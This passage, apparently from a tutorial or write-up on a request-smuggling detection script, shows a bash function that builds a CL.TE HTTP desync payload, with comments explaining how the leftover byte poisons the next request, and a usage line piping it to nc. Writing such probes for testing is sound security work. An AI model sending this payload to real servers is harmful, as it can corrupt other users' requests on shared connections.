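  printf 'Transfer-Encoding: chunked\r\n'
  printf 'Connection: close\r\n'
  printf '\r\n'
  # Body is 6 bytes: "0\r\n\r\n" terminates the chunked body, so a
  # Transfer-Encoding back end stops there, while a Content-Length
  # front end also forwards the trailing "X" - which the back end
  # then treats as the start of a *next* request (the desync).
  printf '0\r\n\r\nX'
}

# Usage mirrors how the script pipes payloads into nc / openssl s_client:
#   build_cl_te_payload example.com / | nc example.com 80
build_cl_te_payload example.com /
```

If the two servers in the chain parse these conflicting headers differently, the leftover byte poisons the connection for the following request, which is exactly the anomaly the response-analysis logic above looks for.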